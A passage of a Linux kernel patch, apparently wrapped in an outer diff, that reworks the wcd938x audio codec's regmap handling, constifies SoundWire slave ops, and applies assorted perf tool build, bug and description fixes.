+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_2:
+-	case WCD938X_DIGITAL_RX_DATA_EDGE_CTL:
+-	case WCD938X_DIGITAL_TX_DATA_EDGE_CTL:
+-	case WCD938X_DIGITAL_GPIO_MODE:
+-	case WCD938X_DIGITAL_PIN_CTL_OE:
+-	case WCD938X_DIGITAL_PIN_CTL_DATA_0:
+-	case WCD938X_DIGITAL_PIN_CTL_DATA_1:
+-	case WCD938X_DIGITAL_DIG_DEBUG_CTL:
+-	case WCD938X_DIGITAL_DIG_DEBUG_EN:
+-	case WCD938X_DIGITAL_ANA_CSR_DBG_ADD:
+-	case WCD938X_DIGITAL_ANA_CSR_DBG_CTL:
+-	case WCD938X_DIGITAL_SSP_DBG:
+-	case WCD938X_DIGITAL_SPARE_0:
+-	case WCD938X_DIGITAL_SPARE_1:
+-	case WCD938X_DIGITAL_SPARE_2:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_0:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_1:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_2:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_3:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_4:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA0:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA1:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA2:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA3:
+-		return true;
+-	}
+-
+-	return false;
+-}
+-
+-static bool wcd938x_readonly_register(struct device *dev, unsigned int reg)
+-{
+-	switch (reg) {
+-	case WCD938X_ANA_MBHC_RESULT_1:
+-	case WCD938X_ANA_MBHC_RESULT_2:
+-	case WCD938X_ANA_MBHC_RESULT_3:
+-	case WCD938X_MBHC_MOISTURE_DET_FSM_STATUS:
+-	case WCD938X_TX_1_2_SAR2_ERR:
+-	case WCD938X_TX_1_2_SAR1_ERR:
+-	case WCD938X_TX_3_4_SAR4_ERR:
+-	case WCD938X_TX_3_4_SAR3_ERR:
+-	case WCD938X_HPH_L_STATUS:
+-	case WCD938X_HPH_R_STATUS:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS:
+-	case WCD938X_EAR_STATUS_REG_1:
+-	case WCD938X_EAR_STATUS_REG_2:
+-	case WCD938X_MBHC_NEW_FSM_STATUS:
+-	case WCD938X_MBHC_NEW_ADC_RESULT:
+-	case WCD938X_DIE_CRACK_DIE_CRK_DET_OUT:
+-	case WCD938X_AUX_INT_STATUS_REG:
+-	case WCD938X_LDORXTX_INT_STATUS:
+-	case WCD938X_DIGITAL_CHIP_ID0:
+-	case WCD938X_DIGITAL_CHIP_ID1:
+-	case WCD938X_DIGITAL_CHIP_ID2:
+-	case WCD938X_DIGITAL_CHIP_ID3:
+-	case WCD938X_DIGITAL_INTR_STATUS_0:
+-	case WCD938X_DIGITAL_INTR_STATUS_1:
+-	case WCD938X_DIGITAL_INTR_STATUS_2:
+-	case WCD938X_DIGITAL_INTR_CLEAR_0:
+-	case WCD938X_DIGITAL_INTR_CLEAR_1:
+-	case WCD938X_DIGITAL_INTR_CLEAR_2:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_1:
+-	case WCD938X_DIGITAL_EFUSE_T_DATA_0:
+-	case WCD938X_DIGITAL_EFUSE_T_DATA_1:
+-	case WCD938X_DIGITAL_PIN_STATUS_0:
+-	case WCD938X_DIGITAL_PIN_STATUS_1:
+-	case WCD938X_DIGITAL_MODE_STATUS_0:
+-	case WCD938X_DIGITAL_MODE_STATUS_1:
+-	case WCD938X_DIGITAL_EFUSE_REG_0:
+-	case WCD938X_DIGITAL_EFUSE_REG_1:
+-	case WCD938X_DIGITAL_EFUSE_REG_2:
+-	case WCD938X_DIGITAL_EFUSE_REG_3:
+-	case WCD938X_DIGITAL_EFUSE_REG_4:
+-	case WCD938X_DIGITAL_EFUSE_REG_5:
+-	case WCD938X_DIGITAL_EFUSE_REG_6:
+-	case WCD938X_DIGITAL_EFUSE_REG_7:
+-	case WCD938X_DIGITAL_EFUSE_REG_8:
+-	case WCD938X_DIGITAL_EFUSE_REG_9:
+-	case WCD938X_DIGITAL_EFUSE_REG_10:
+-	case WCD938X_DIGITAL_EFUSE_REG_11:
+-	case WCD938X_DIGITAL_EFUSE_REG_12:
+-	case WCD938X_DIGITAL_EFUSE_REG_13:
+-	case WCD938X_DIGITAL_EFUSE_REG_14:
+-	case WCD938X_DIGITAL_EFUSE_REG_15:
+-	case WCD938X_DIGITAL_EFUSE_REG_16:
+-	case WCD938X_DIGITAL_EFUSE_REG_17:
+-	case WCD938X_DIGITAL_EFUSE_REG_18:
+-	case WCD938X_DIGITAL_EFUSE_REG_19:
+-	case WCD938X_DIGITAL_EFUSE_REG_20:
+-	case WCD938X_DIGITAL_EFUSE_REG_21:
+-	case WCD938X_DIGITAL_EFUSE_REG_22:
+-	case WCD938X_DIGITAL_EFUSE_REG_23:
+-	case WCD938X_DIGITAL_EFUSE_REG_24:
+-	case WCD938X_DIGITAL_EFUSE_REG_25:
+-	case WCD938X_DIGITAL_EFUSE_REG_26:
+-	case WCD938X_DIGITAL_EFUSE_REG_27:
+-	case WCD938X_DIGITAL_EFUSE_REG_28:
+-	case WCD938X_DIGITAL_EFUSE_REG_29:
+-	case WCD938X_DIGITAL_EFUSE_REG_30:
+-	case WCD938X_DIGITAL_EFUSE_REG_31:
+-		return true;
+-	}
+-	return false;
+-}
+-
+-static bool wcd938x_readable_register(struct device *dev, unsigned int reg)
+-{
+-	bool ret;
+-
+-	ret = wcd938x_readonly_register(dev, reg);
+-	if (!ret)
+-		return wcd938x_rdwr_register(dev, reg);
+-
+-	return ret;
+-}
+-
+-static bool wcd938x_writeable_register(struct device *dev, unsigned int reg)
+-{
+-	return wcd938x_rdwr_register(dev, reg);
+-}
+-
+-static bool wcd938x_volatile_register(struct device *dev, unsigned int reg)
+-{
+-	if (reg <= WCD938X_BASE_ADDRESS)
+-		return false;
+-
+-	if (reg == WCD938X_DIGITAL_SWR_TX_CLK_RATE)
+-		return true;
+-
+-	if (wcd938x_readonly_register(dev, reg))
+-		return true;
+-
+-	return false;
+-}
+-
+-static struct regmap_config wcd938x_regmap_config = {
+-	.name = "wcd938x_csr",
+-	.reg_bits = 32,
+-	.val_bits = 8,
+-	.cache_type = REGCACHE_RBTREE,
+-	.reg_defaults = wcd938x_defaults,
+-	.num_reg_defaults = ARRAY_SIZE(wcd938x_defaults),
+-	.max_register = WCD938X_MAX_REGISTER,
+-	.readable_reg = wcd938x_readable_register,
+-	.writeable_reg = wcd938x_writeable_register,
+-	.volatile_reg = wcd938x_volatile_register,
+-	.can_multi_write = true,
+-};
+-
+ static const struct regmap_irq wcd938x_irqs[WCD938X_NUM_IRQS] = {
+ 	REGMAP_IRQ_REG(WCD938X_IRQ_MBHC_BUTTON_PRESS_DET, 0, 0x01),
+ 	REGMAP_IRQ_REG(WCD938X_IRQ_MBHC_BUTTON_RELEASE_DET, 0, 0x02),
+@@ -4412,10 +3417,10 @@ static int wcd938x_bind(struct device *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	wcd938x->regmap = devm_regmap_init_sdw(wcd938x->tx_sdw_dev, &wcd938x_regmap_config);
+-	if (IS_ERR(wcd938x->regmap)) {
+-		dev_err(dev, "%s: tx csr regmap not found\n", __func__);
+-		return PTR_ERR(wcd938x->regmap);
++	wcd938x->regmap = dev_get_regmap(&wcd938x->tx_sdw_dev->dev, NULL);
++	if (!wcd938x->regmap) {
++		dev_err(dev, "could not get TX device regmap\n");
++		return -EINVAL;
+ 	}
+ 
+ 	ret = wcd938x_irq_init(wcd938x, dev);
+diff --git a/sound/soc/codecs/wcd938x.h b/sound/soc/codecs/wcd938x.h
+index ea82039e78435..74b1498fec38b 100644
+--- a/sound/soc/codecs/wcd938x.h
++++ b/sound/soc/codecs/wcd938x.h
+@@ -663,6 +663,7 @@ struct wcd938x_sdw_priv {
+ 	bool is_tx;
+ 	struct wcd938x_priv *wcd938x;
+ 	struct irq_domain *slave_irq;
++	struct regmap *regmap;
+ };
+ 
+ #if IS_ENABLED(CONFIG_SND_SOC_WCD938X_SDW)
+diff --git a/sound/soc/codecs/wsa881x.c b/sound/soc/codecs/wsa881x.c
+index 6c8b1db649b89..046843b57b038 100644
+--- a/sound/soc/codecs/wsa881x.c
++++ b/sound/soc/codecs/wsa881x.c
+@@ -1101,7 +1101,7 @@ static int wsa881x_bus_config(struct sdw_slave *slave,
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops wsa881x_slave_ops = {
++static const struct sdw_slave_ops wsa881x_slave_ops = {
+ 	.update_status = wsa881x_update_status,
+ 	.bus_config = wsa881x_bus_config,
+ 	.port_prep = wsa881x_port_prep,
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index 58fdb4e9fd978..693e988f30c0f 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -1073,7 +1073,7 @@ static int wsa883x_port_prep(struct sdw_slave *slave,
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops wsa883x_slave_ops = {
++static const struct sdw_slave_ops wsa883x_slave_ops = {
+ 	.update_status = wsa883x_update_status,
+ 	.port_prep = wsa883x_port_prep,
+ };
+diff --git a/sound/soc/intel/common/soc-acpi-intel-byt-match.c b/sound/soc/intel/common/soc-acpi-intel-byt-match.c
+index db5a92b9875a8..87c44f284971a 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-byt-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-byt-match.c
+@@ -124,7 +124,7 @@ static const struct snd_soc_acpi_codecs rt5640_comp_ids = {
+ };
+ 
+ static const struct snd_soc_acpi_codecs wm5102_comp_ids = {
+-	.num_codecs = 2,
++	.num_codecs = 3,
+ 	.codecs = { "10WM5102", "WM510204", "WM510205"},
+ };
+ 
+diff --git a/sound/usb/caiaq/input.c b/sound/usb/caiaq/input.c
+index 1e2cf2f08eecd..84f26dce7f5d0 100644
+--- a/sound/usb/caiaq/input.c
++++ b/sound/usb/caiaq/input.c
+@@ -804,6 +804,7 @@ int snd_usb_caiaq_input_init(struct snd_usb_caiaqdev *cdev)
+ 
+ 	default:
+ 		/* no input methods supported on this device */
++		ret = -EINVAL;
+ 		goto exit_free_idev;
+ 	}
+ 
+diff --git a/tools/perf/Build b/tools/perf/Build
+index 6dd67e5022955..aa76236228349 100644
+--- a/tools/perf/Build
++++ b/tools/perf/Build
+@@ -56,6 +56,6 @@ CFLAGS_builtin-report.o	   += -DDOCDIR="BUILD_STR($(srcdir_SQ)/Documentation)"
+ perf-y += util/
+ perf-y += arch/
+ perf-y += ui/
+-perf-$(CONFIG_LIBTRACEEVENT) += scripts/
++perf-y += scripts/
+ 
+ gtk-y += ui/gtk/
+diff --git a/tools/perf/Makefile.perf b/tools/perf/Makefile.perf
+index b7d9c42062300..cc2b0ace54bac 100644
+--- a/tools/perf/Makefile.perf
++++ b/tools/perf/Makefile.perf
+@@ -647,13 +647,16 @@ all: shell_compatibility_test $(ALL_PROGRAMS) $(LANG_BINDINGS) $(OTHER_PROGRAMS)
+ # Create python binding output directory if not already present
+ _dummy := $(shell [ -d '$(OUTPUT)python' ] || mkdir -p '$(OUTPUT)python')
+ 
+-$(OUTPUT)python/perf$(PYTHON_EXTENSION_SUFFIX): $(PYTHON_EXT_SRCS) $(PYTHON_EXT_DEPS) $(LIBPERF)
++$(OUTPUT)python/perf$(PYTHON_EXTENSION_SUFFIX): $(PYTHON_EXT_SRCS) $(PYTHON_EXT_DEPS) $(LIBPERF) $(LIBSUBCMD)
+ 	$(QUIET_GEN)LDSHARED="$(CC) -pthread -shared" \
+         CFLAGS='$(CFLAGS)' LDFLAGS='$(LDFLAGS)' \
+ 	  $(PYTHON_WORD) util/setup.py \
+ 	  --quiet build_ext; \
+ 	cp $(PYTHON_EXTBUILD_LIB)perf*.so $(OUTPUT)python/
+ 
++python_perf_target:
++	@echo "Target is: $(OUTPUT)python/perf$(PYTHON_EXTENSION_SUFFIX)"
++
+ please_set_SHELL_PATH_to_a_more_modern_shell:
+ 	$(Q)$$(:)
+ 
+@@ -1151,7 +1154,7 @@ FORCE:
+ .PHONY: all install clean config-clean strip install-gtk
+ .PHONY: shell_compatibility_test please_set_SHELL_PATH_to_a_more_modern_shell
+ .PHONY: .FORCE-PERF-VERSION-FILE TAGS tags cscope FORCE prepare
+-.PHONY: archheaders
++.PHONY: archheaders python_perf_target
+ 
+ endif # force_fixdep
+ 
+diff --git a/tools/perf/builtin-ftrace.c b/tools/perf/builtin-ftrace.c
+index d7fe00f66b831..fb1b66ef2e167 100644
+--- a/tools/perf/builtin-ftrace.c
++++ b/tools/perf/builtin-ftrace.c
+@@ -1228,10 +1228,12 @@ int cmd_ftrace(int argc, const char **argv)
+ 		goto out_delete_filters;
+ 	}
+ 
++	/* Make system wide (-a) the default target. */
++	if (!argc && target__none(&ftrace.target))
++		ftrace.target.system_wide = true;
++
+ 	switch (subcmd) {
+ 	case PERF_FTRACE_TRACE:
+-		if (!argc && target__none(&ftrace.target))
+-			ftrace.target.system_wide = true;
+ 		cmd_func = __cmd_ftrace;
+ 		break;
+ 	case PERF_FTRACE_LATENCY:
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index 8374117e66f6e..be7c0c29d15b0 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -1866,7 +1866,7 @@ static void __record__read_lost_samples(struct record *rec, struct evsel *evsel,
+ 	int id_hdr_size;
+ 
+ 	if (perf_evsel__read(&evsel->core, cpu_idx, thread_idx, &count) < 0) {
+-		pr_err("read LOST count failed\n");
++		pr_debug("read LOST count failed\n");
+ 		return;
+ 	}
+ 
+diff --git a/tools/perf/builtin-script.c b/tools/perf/builtin-script.c
+index 69394ac0a20dc..2f185012b9dda 100644
+--- a/tools/perf/builtin-script.c
++++ b/tools/perf/builtin-script.c
+@@ -2288,8 +2288,8 @@ static void setup_scripting(void)
+ {
+ #ifdef HAVE_LIBTRACEEVENT
+ 	setup_perl_scripting();
+-	setup_python_scripting();
+ #endif
++	setup_python_scripting();
+ }
+ 
+ static int flush_scripting(void)
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index 387dc9c9e7bee..682db49eef4cb 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -773,7 +773,7 @@ static int __run_perf_stat(int argc, const char **argv, int run_idx)
+ 		counter->reset_group = false;
+ 		if (bpf_counter__load(counter, &target))
+ 			return -1;
+-		if (!evsel__is_bpf(counter))
++		if (!(evsel__is_bperf(counter)))
+ 			all_counters_use_bpf = false;
+ 	}
+ 
+@@ -789,7 +789,7 @@ static int __run_perf_stat(int argc, const char **argv, int run_idx)
+ 
+ 		if (counter->reset_group || counter->errored)
+ 			continue;
+-		if (evsel__is_bpf(counter))
++		if (evsel__is_bperf(counter))
+ 			continue;
+ try_again:
+ 		if (create_perf_stat_counter(counter, &stat_config, &target,
+diff --git a/tools/perf/pmu-events/arch/powerpc/power9/other.json b/tools/perf/pmu-events/arch/powerpc/power9/other.json
+index 3f69422c21f99..f10bd554521a0 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power9/other.json
++++ b/tools/perf/pmu-events/arch/powerpc/power9/other.json
+@@ -1417,7 +1417,7 @@
+   {
+     "EventCode": "0x45054",
+     "EventName": "PM_FMA_CMPL",
+-    "BriefDescription": "two flops operation completed (fmadd, fnmadd, fmsub, fnmsub) Scalar instructions only. "
++    "BriefDescription": "two flops operation completed (fmadd, fnmadd, fmsub, fnmsub) Scalar instructions only."
+   },
+   {
+     "EventCode": "0x201E8",
+@@ -2017,7 +2017,7 @@
+   {
+     "EventCode": "0xC0BC",
+     "EventName": "PM_LSU_FLUSH_OTHER",
+-    "BriefDescription": "Other LSU flushes including: Sync (sync ack from L2 caused search of LRQ for oldest snooped load, This will either signal a Precise Flush of the oldest snooped loa or a Flush Next PPC); Data Valid Flush Next (several cases of this, one example is store and reload are lined up such that a store-hit-reload scenario exists and the CDF has already launched and has gotten bad/stale data); Bad Data Valid Flush Next (might be a few cases of this, one example is a larxa (D$ hit) return data and dval but can't allocate to LMQ (LMQ full or other reason). Already gave dval but can't watch it for snoop_hit_larx. Need to take the “bad dval” back and flush all younger ops)"
++    "BriefDescription": "Other LSU flushes including: Sync (sync ack from L2 caused search of LRQ for oldest snooped load, This will either signal a Precise Flush of the oldest snooped loa or a Flush Next PPC); Data Valid Flush Next (several cases of this, one example is store and reload are lined up such that a store-hit-reload scenario exists and the CDF has already launched and has gotten bad/stale data); Bad Data Valid Flush Next (might be a few cases of this, one example is a larxa (D$ hit) return data and dval but can't allocate to LMQ (LMQ full or other reason). Already gave dval but can't watch it for snoop_hit_larx. Need to take the 'bad dval' back and flush all younger ops)"
+   },
+   {
+     "EventCode": "0x5094",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json b/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
+index d0265f255de2b..723bffa41c448 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
++++ b/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
+@@ -442,7 +442,7 @@
+   {
+     "EventCode": "0x4D052",
+     "EventName": "PM_2FLOP_CMPL",
+-    "BriefDescription": "DP vector version of fmul, fsub, fcmp, fsel, fabs, fnabs, fres ,fsqrte, fneg "
++    "BriefDescription": "DP vector version of fmul, fsub, fcmp, fsel, fabs, fnabs, fres ,fsqrte, fneg"
+   },
+   {
+     "EventCode": "0x1F142",
+diff --git a/tools/perf/pmu-events/arch/s390/cf_z16/extended.json b/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
+index c306190fc06f2..c2b10ec1c6e01 100644
+--- a/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
++++ b/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
+@@ -95,28 +95,28 @@
+ 		"EventCode": "145",
+ 		"EventName": "DCW_REQ",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "146",
+ 		"EventName": "DCW_REQ_IV",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Intervention",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache with intervention."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache with intervention."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "147",
+ 		"EventName": "DCW_REQ_CHIP_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Chip HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache after using chip level horizontal persistence, Chip-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache after using chip level horizontal persistence, Chip-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "148",
+ 		"EventName": "DCW_REQ_DRAWER_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Drawer HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache after using drawer level horizontal persistence, Drawer-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache after using drawer level horizontal persistence, Drawer-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+@@ -284,7 +284,7 @@
+ 		"EventCode": "172",
+ 		"EventName": "ICW_REQ_DRAWER_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Instruction Cache from Cache with Drawer HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Instruction cache directory where the returned cache line was sourced from the requestor’s Level-2 cache using drawer level horizontal persistence, Drawer-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Instruction cache directory where the returned cache line was sourced from the requestors Level-2 cache using drawer level horizontal persistence, Drawer-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+diff --git a/tools/perf/scripts/Build b/tools/perf/scripts/Build
+index 68d4b54574adb..7d8e2e57faac5 100644
+--- a/tools/perf/scripts/Build
++++ b/tools/perf/scripts/Build
+@@ -1,2 +1,4 @@
+-perf-$(CONFIG_LIBPERL)   += perl/Perf-Trace-Util/
++ifeq ($(CONFIG_LIBTRACEEVENT),y)
++  perf-$(CONFIG_LIBPERL)   += perl/Perf-Trace-Util/
++endif
+ perf-$(CONFIG_LIBPYTHON) += python/Perf-Trace-Util/
+diff --git a/tools/perf/scripts/python/Perf-Trace-Util/Build b/tools/perf/scripts/python/Perf-Trace-Util/Build
+index d5fed4e426179..7d0e33ce6aba4 100644
+--- a/tools/perf/scripts/python/Perf-Trace-Util/Build
++++ b/tools/perf/scripts/python/Perf-Trace-Util/Build
+@@ -1,3 +1,3 @@
+-perf-$(CONFIG_LIBTRACEEVENT) += Context.o
++perf-y += Context.o
+ 
+ CFLAGS_Context.o += $(PYTHON_EMBED_CCOPTS) -Wno-redundant-decls -Wno-strict-prototypes -Wno-unused-parameter -Wno-nested-externs
+diff --git a/tools/perf/scripts/python/Perf-Trace-Util/Context.c b/tools/perf/scripts/python/Perf-Trace-Util/Context.c
+index 895f5fc239653..b0d449f41650f 100644
+--- a/tools/perf/scripts/python/Perf-Trace-Util/Context.c
++++ b/tools/perf/scripts/python/Perf-Trace-Util/Context.c
+@@ -59,6 +59,7 @@ static struct scripting_context *get_scripting_context(PyObject *args)
+ 	return get_args(args, "context", NULL);
+ }
+ 
++#ifdef HAVE_LIBTRACEEVENT
+ static PyObject *perf_trace_context_common_pc(PyObject *obj, PyObject *args)
+ {
+ 	struct scripting_context *c = get_scripting_context(args);
+@@ -90,6 +91,7 @@ static PyObject *perf_trace_context_common_lock_depth(PyObject *obj,
+ 
+ 	return Py_BuildValue("i", common_lock_depth(c));
+ }
++#endif
+ 
+ static PyObject *perf_sample_insn(PyObject *obj, PyObject *args)
+ {
+@@ -178,12 +180,14 @@ static PyObject *perf_sample_srccode(PyObject *obj, PyObject *args)
+ }
+ 
+ static PyMethodDef ContextMethods[] = {
++#ifdef HAVE_LIBTRACEEVENT
+ 	{ "common_pc", perf_trace_context_common_pc, METH_VARARGS,
+ 	  "Get the common preempt count event field value."},
+ 	{ "common_flags", perf_trace_context_common_flags, METH_VARARGS,
+ 	  "Get the common flags event field value."},
+ 	{ "common_lock_depth", perf_trace_context_common_lock_depth,
+ 	  METH_VARARGS,	"Get the common lock depth event field value."},
++#endif
+ 	{ "perf_sample_insn", perf_sample_insn,
+ 	  METH_VARARGS,	"Get the machine code instruction."},
+ 	{ "perf_set_itrace_options", perf_set_itrace_options,
+diff --git a/tools/perf/scripts/python/intel-pt-events.py b/tools/perf/scripts/python/intel-pt-events.py
+index 08862a2582f44..1c76368f13c1a 100644
+--- a/tools/perf/scripts/python/intel-pt-events.py
++++ b/tools/perf/scripts/python/intel-pt-events.py
+@@ -11,7 +11,7 @@
+ # FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
+ # more details.
+ 
+-from __future__ import print_function
++from __future__ import division, print_function
+ 
+ import io
+ import os
+diff --git a/tools/perf/tests/make b/tools/perf/tests/make
+index 009d6efb673ce..deb37fb982e97 100644
+--- a/tools/perf/tests/make
++++ b/tools/perf/tests/make
+@@ -62,10 +62,11 @@ lib = lib
+ endif
+ 
+ has = $(shell which $1 2>/dev/null)
++python_perf_so := $(shell $(MAKE) python_perf_target|grep "Target is:"|awk '{print $$3}')
+ 
+ # standard single make variable specified
+ make_clean_all      := clean all
+-make_python_perf_so := python/perf.so
++make_python_perf_so := $(python_perf_so)
+ make_debug          := DEBUG=1
+ make_no_libperl     := NO_LIBPERL=1
+ make_no_libpython   := NO_LIBPYTHON=1
+@@ -204,7 +205,7 @@ test_make_doc    := $(test_ok)
+ test_make_help_O := $(test_ok)
+ test_make_doc_O  := $(test_ok)
+ 
+-test_make_python_perf_so := test -f $(PERF_O)/python/perf.so
++test_make_python_perf_so := test -f $(PERF_O)/$(python_perf_so)
+ 
+ test_make_perf_o           := test -f $(PERF_O)/perf.o
+ test_make_util_map_o       := test -f $(PERF_O)/util/map.o
+diff --git a/tools/perf/tests/shell/record_offcpu.sh b/tools/perf/tests/shell/record_offcpu.sh
+index e01973d4e0fba..f062ae9a95e1a 100755
+--- a/tools/perf/tests/shell/record_offcpu.sh
++++ b/tools/perf/tests/shell/record_offcpu.sh
+@@ -65,7 +65,7 @@ test_offcpu_child() {
+ 
+   # perf bench sched messaging creates 400 processes
+   if ! perf record --off-cpu -e dummy -o ${perfdata} -- \
+-    perf bench sched messaging -g 10 > /dev/null 2&>1
++    perf bench sched messaging -g 10 > /dev/null 2>&1
+   then
+     echo "Child task off-cpu test [Failed record]"
+     err=1
+diff --git a/tools/perf/util/Build b/tools/perf/util/Build
+index 79b9498886a20..fa87597398780 100644
+--- a/tools/perf/util/Build
++++ b/tools/perf/util/Build
+@@ -78,7 +78,7 @@ perf-y += pmu-bison.o
+ perf-y += pmu-hybrid.o
+ perf-y += svghelper.o
+ perf-$(CONFIG_LIBTRACEEVENT) += trace-event-info.o
+-perf-$(CONFIG_LIBTRACEEVENT) += trace-event-scripting.o
++perf-y += trace-event-scripting.o
+ perf-$(CONFIG_LIBTRACEEVENT) += trace-event.o
+ perf-$(CONFIG_LIBTRACEEVENT) += trace-event-parse.o
+ perf-$(CONFIG_LIBTRACEEVENT) += trace-event-read.o
+diff --git a/tools/perf/util/cs-etm.c b/tools/perf/util/cs-etm.c
+index 33303d03c2fa4..2f327986090e1 100644
+--- a/tools/perf/util/cs-etm.c
++++ b/tools/perf/util/cs-etm.c
+@@ -2488,26 +2488,29 @@ static int cs_etm__process_auxtrace_event(struct perf_session *session,
+ 	return 0;
+ }
+ 
+-static bool cs_etm__is_timeless_decoding(struct cs_etm_auxtrace *etm)
++static int cs_etm__setup_timeless_decoding(struct cs_etm_auxtrace *etm)
+ {
+ 	struct evsel *evsel;
+ 	struct evlist *evlist = etm->session->evlist;
+-	bool timeless_decoding = true;
+ 
+ 	/* Override timeless mode with user input from --itrace=Z */
+-	if (etm->synth_opts.timeless_decoding)
+-		return true;
++	if (etm->synth_opts.timeless_decoding) {
++		etm->timeless_decoding = true;
++		return 0;
++	}
+ 
+ 	/*
+-	 * Circle through the list of event and complain if we find one
+-	 * with the time bit set.
++	 * Find the cs_etm evsel and look at what its timestamp setting was
+ 	 */
+-	evlist__for_each_entry(evlist, evsel) {
+-		if ((evsel->core.attr.sample_type & PERF_SAMPLE_TIME))
+-			timeless_decoding = false;
+-	}
++	evlist__for_each_entry(evlist, evsel)
++		if (cs_etm__evsel_is_auxtrace(etm->session, evsel)) {
++			etm->timeless_decoding =
++				!(evsel->core.attr.config & BIT(ETM_OPT_TS));
++			return 0;
++		}
+ 
+-	return timeless_decoding;
++	pr_err("CS ETM: Couldn't find ETM evsel\n");
++	return -EINVAL;
+ }
+ 
+ /*
+@@ -2884,7 +2887,6 @@ int cs_etm__process_auxtrace_info_full(union perf_event *event,
+ 	etm->snapshot_mode = (ptr[CS_ETM_SNAPSHOT] != 0);
+ 	etm->metadata = metadata;
+ 	etm->auxtrace_type = auxtrace_info->type;
+-	etm->timeless_decoding = cs_etm__is_timeless_decoding(etm);
+ 
+ 	etm->auxtrace.process_event = cs_etm__process_event;
+ 	etm->auxtrace.process_auxtrace_event = cs_etm__process_auxtrace_event;
+@@ -2894,6 +2896,10 @@ int cs_etm__process_auxtrace_info_full(union perf_event *event,
+ 	etm->auxtrace.evsel_is_auxtrace = cs_etm__evsel_is_auxtrace;
+ 	session->auxtrace = &etm->auxtrace;
+ 
++	err = cs_etm__setup_timeless_decoding(etm);
++	if (err)
++		return err;
++
+ 	etm->unknown_thread = thread__new(999999999, 999999999);
+ 	if (!etm->unknown_thread) {
+ 		err = -ENOMEM;
+diff --git a/tools/perf/util/evsel.h b/tools/perf/util/evsel.h
+index d572be41b9608..2899c97d997cd 100644
+--- a/tools/perf/util/evsel.h
++++ b/tools/perf/util/evsel.h
+@@ -269,6 +269,11 @@ static inline bool evsel__is_bpf(struct evsel *evsel)
+ 	return evsel->bpf_counter_ops != NULL;
+ }
+ 
++static inline bool evsel__is_bperf(struct evsel *evsel)
++{
++	return evsel->bpf_counter_ops != NULL && list_empty(&evsel->bpf_counter_list);
++}
++
+ #define EVSEL__MAX_ALIASES 8
+ 
+ extern const char *const evsel__hw_cache[PERF_COUNT_HW_CACHE_MAX][EVSEL__MAX_ALIASES];
+diff --git a/tools/perf/util/pmu.c b/tools/perf/util/pmu.c
+index 2bdeb89352e7a..be49be366c05c 100644
+--- a/tools/perf/util/pmu.c
++++ b/tools/perf/util/pmu.c
+@@ -1833,7 +1833,7 @@ static int perf_pmu__new_caps(struct list_head *list, char *name, char *value)
+ 	return 0;
+ 
+ free_name:
+-	zfree(caps->name);
++	zfree(&caps->name);
+ free_caps:
+ 	free(caps);
+ 
+diff --git a/tools/perf/util/scripting-engines/Build b/tools/perf/util/scripting-engines/Build
